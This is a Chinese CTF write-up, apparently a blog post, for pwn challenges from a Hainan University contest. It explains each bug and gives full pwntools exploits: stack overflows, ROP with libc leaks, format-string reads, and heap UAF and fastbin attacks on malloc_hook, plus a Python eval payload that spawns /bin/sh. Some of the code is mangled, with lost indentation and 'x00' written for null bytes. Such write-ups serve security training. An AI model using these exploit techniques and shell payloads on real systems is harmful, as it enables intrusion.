国庆在家摸鱼,听到同学说有这个海南大学举办的比赛,于是就来随便玩了玩 摸鱼日记
总体难度并不大,pwn题的考点都比较基础和常规,可以作为一个基础知识的回顾与熟悉
Writeup
pwn
calculator
漏洞点:使用了python2中的input函数,导致了任意代码执行
payload:
__import__('os').system("/bin/sh")
即可get shell
warmup
题目需要输入一个int型数据使得abs(v4)<0
我们只需输入最小的整数即可get shell 输入-231 即-2147483648
backdoor
简单的栈溢出,有后门,直接溢出到后门函数即可
exp:
from pwn import *
p= remote('39.107.127.44',10002)
p.recvuntil('name:')
backdoor = 0x400697
payload = 'a'*0xA+'a'*8+p64(backdoor)
p.send(payload)
p.interactive()
pwnme
没有开NX,有RWX的段并且可以往bss段上写数据,在bss段上写入shellcode,然后栈溢出返回地址到shellcode处即可
exp:
from pwn import*
p = remote('39.107.127.44',10006)
#p=process('./pwnme')
elf=ELF('./pwnme')
context(os='linux',arch='amd64',log_level='debug')
shellcode = asm(shellcraft.sh())
p.recvuntil('Name:')
p.send(shellcode)
payload='a'*40+p64(0x601080)
p.recvuntil('Try your best:')
p.sendline(payload)
p.interactive()
babyrop
通过puts泄露libc基址,然后rop打one_gadget
exp:
from pwn import*
p = process('./babyrop')
#ip = '39.107.127.44'
#port ='10001'
p = remote('39.107.127.44',10001)
elf = ELF('./babyrop')
libc = ELF('./libc-2.23-64.so')
main = 0x400617
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
pop_rdi = 0x4006d3
p.recvuntil('Your input :')
payload = 'a'*0x28+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main)
p.send(payload)
puts_add = u64(p.recv(6).ljust(8,'x00'))
libc_base = puts_add - libc.symbols['puts']
log.info('puts:'+hex(puts_add))
log.info('libc_base:'+hex(libc_base))
one = libc_base + 0xf0364
p.recvuntil('Your input :')
payload = 'a'*0x28 + p64(one)
p.sendline(payload)
p.interactive()
echo
printf存在格式化字符串漏洞,flag被读到了栈上,利用格式化字符串将flag打印出来即可。
经过调试,得到flag在%27$p
%37$p 的位置上
每一项读出来十六进制转字符后逆序,最后全部拼接起来即可
exp:
from pwn import*
p = remote('39.107.127.44',10004)
flag = ""
def leak(index):
p.recvuntil('>')
payload = '%'+str(index)+'$'+'p'
p.sendline(payload)
answer = p.recvuntil('
')[:-1]
b = int(answer,16)
answer = p64(b)[:4]
return answer
for i in range(27,38):
flag += leak(i)
print flag
easyheap
存在UAF漏洞,利用unsorted bin泄露libc基址,然后fastbin attack 打 mallochook
exp:
from pwn import *
#p = process('./easyheap')
p = remote('39.107.127.44',10003)
libc = ELF('./libc-2.23.so')
#context.log_level='debug'
def add(id,size,content):
p.sendlineafter('Your choice :','1')
p.sendlineafter('id:',str(id))
p.sendlineafter('size:',str(size))
p.sendafter('content:',content)
def edit(id,content):
p.sendlineafter('Your choice :','2')
p.sendlineafter('id:',str(id))
p.sendafter('content:',content)
def delete(id):
p.sendlineafter('Your choice :','3')
p.sendlineafter('id:',str(id))
def show(id):
p.sendlineafter('Your choice :','4')
p.sendlineafter('id:',str(id))
add(0,0x90,'aaaa')
add(1,0x90,'bbbb')
delete(0)
#gdb.attach(p)
show(0)
p.recvline()
main_arena = u64(p.recv(6).ljust(8,'x00')) - 88
libc_base = main_arena-0x10-libc.sym['__malloc_hook']
log.info('libc_base:%x',libc_base)
malloc_hook=libc_base+libc.sym['__malloc_hook']
log.info('fake:0x%x',malloc_hook-0x23)
one = libc_base + 0x4527a
add(2,0x60,'cccc')
add(3,0x60,'dddd')
delete(2)
edit(2,p64(malloc_hook-0x23))
add(4,0x60,'eeee')
add(5,0x60,'x00'*0x13+p64(one))
#gdb.attach(p)
p.sendlineafter('Your choice :','1')
p.sendlineafter('id:',str(6))
p.sendlineafter('size:',str(0x10))
p.interactive()
babyheap
存在堆溢出漏洞,unsorted bin泄露地址,fastbin attack 打malloc hook
exp:
from pwn import *
p = process('./babyheap')
p = remote('39.107.127.44',10000)
libc = ELF('./libc-2.23.so')
#context.log_level='debug'
def add(id,size,content):
p.sendlineafter('Your choice :','1')
p.sendlineafter('id:',str(id))
p.sendlineafter('size:',str(size))
p.sendafter('content:',content)
def edit(id,size,content):
p.sendlineafter('Your choice :','2')
p.sendlineafter('id:',str(id))
p.sendlineafter('size:',str(size))
p.sendafter('content:',content)
def delete(id):
p.sendlineafter('Your choice :','3')
p.sendlineafter('id:',str(id))
def show(id):
p.sendlineafter('Your choice :','4')
p.sendlineafter('id:',str(id))
add(0,0x90,'aaaa')
add(1,0x90,'bbbb')
delete(0)
#gdb.attach(p)
add(2,0x50,'c'*8)
#gdb.attach(p)
show(2)
p.recvuntil('c'*8)
main_arena = u64(p.recv(6).ljust(8,'x00')) - ( 0xc08 - 0xb78) -88
log.info('main_arena:%x',main_arena)
#gdb.attach(p)
malloc_hook = main_arena - 0x10
libc_base = main_arena - 0x10 -libc.sym['__malloc_hook']
one = libc_base + 0x4527a
log.info('fake:0x%x',malloc_hook-0x23)
add(3,0x60,'dddd')
add(4,0x60,'eeee')
add(5,0x60,'ffff')
delete(4)
#gdb.attach(p)
edit(3,0x80,'x00'*0x68+p64(0x71)+p64(malloc_hook-0x23))
add(6,0x60,'gggg')
add(7,0x60,'x00'*0x13+p64(one))
#gdb.attach(p)
p.sendlineafter('Your choice :','1')
p.sendlineafter('id:',str(8))
p.sendlineafter('size:',str(0x10))
p.interactive()
hardheap
edit函数存在off-by-one漏洞,溢出1字节,先通过unsorted bin泄露libc地址
再通过off-by-one造成块堆叠,制造fastbin attack,打malloc hook
exp:
from pwn import *
#p = process('./hardheap')
p = remote('39.107.127.44',10005)
libc = ELF('./libc-2.23.so')
#context.log_level='debug'
def add(id,size,content):
p.sendlineafter('Your choice :','1')
p.sendlineafter('id:',str(id))
p.sendlineafter('size:',str(size))
p.sendafter('content:',content)
def edit(id,content):
p.sendlineafter('Your choice :','2')
p.sendlineafter('id:',str(id))
p.sendafter('content:',content)
def delete(id):
p.sendlineafter('Your choice :','3')
p.sendlineafter('id:',str(id))
def show(id):
p.sendlineafter('Your choice :','4')
p.sendlineafter('id:',str(id))
add(0,0x90,'aaaa')
add(1,0x18,'bbbb')
delete(0)
add(2,0x50,'c'*8)
show(2)
p.recvuntil('c'*8)
main_arena = u64(p.recv(6).ljust(8,'x00')) - ( 0xc08 - 0xb78) -88
log.info('main_arena:0x%x',main_arena)
#gdb.attach(p)
malloc_hook = main_arena - 0x10
libc_base = main_arena - 0x10 -libc.sym['__malloc_hook']
log.info('fake:0x%x',malloc_hook-0x23)
one = libc_base + 0x4527a
add(3,0x30,'dddd')
add(4,0x18,'eeee')
add(5,0x60,'ffff')
add(6,0x18,'gggg')
edit(1,'x00'*0x18+p8(0x91))
delete(4)
add(7,0x80,'hhhh')
delete(5)
edit(7,'x00'*0x18+p64(0x71)+p64(malloc_hook-0x23))
add(8,0x60,'iiii')
add(9,0x60,'x00'*0x13+p64(one))
#gdb.attach(p)
p.sendlineafter('Your choice :','1')
p.sendlineafter('id:',str(10))
p.sendlineafter('size:',str(0x10))
p.interactive()